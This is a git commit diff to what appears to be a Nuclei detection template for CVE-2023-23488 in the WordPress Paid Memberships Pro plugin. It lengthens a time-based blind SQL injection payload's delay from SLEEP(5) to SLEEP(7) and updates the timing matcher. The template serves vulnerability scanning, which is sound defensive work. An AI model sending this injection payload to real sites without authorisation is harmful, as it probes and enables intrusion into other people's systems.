Update CVE-2023-23488.yaml

patch-1
J4vaovo 2024-02-06 23:40:49 +08:00 committed by GitHub
parent bf5e6b3fdb
commit 867400bcc9
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 3 additions and 3 deletions

View File

@ -36,7 +36,7 @@ http:
- raw:
- |
@timeout: 30s
GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20- HTTP/1.1
GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1
@ -45,8 +45,8 @@ http:
matchers:
- type: dsl
dsl:
- duration_1>=5
- duration_1>=7
- status_code_1 != 403 # Wordfence
- contains(body_2, "pmpro_updates")
condition: and
# digest: 490a0046304402201f4e8222f27c1dc7be25568f55e8568fcc825b89bf0a50617616b52ef90ba78c022012551c1be76c97967a28849e30afbc19cad34dbad947f6cc225b5b6c42cfd8d3:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402201f4e8222f27c1dc7be25568f55e8568fcc825b89bf0a50617616b52ef90ba78c022012551c1be76c97967a28849e30afbc19cad34dbad947f6cc225b5b6c42cfd8d3:922c64590222798bb761d5b6d8e72950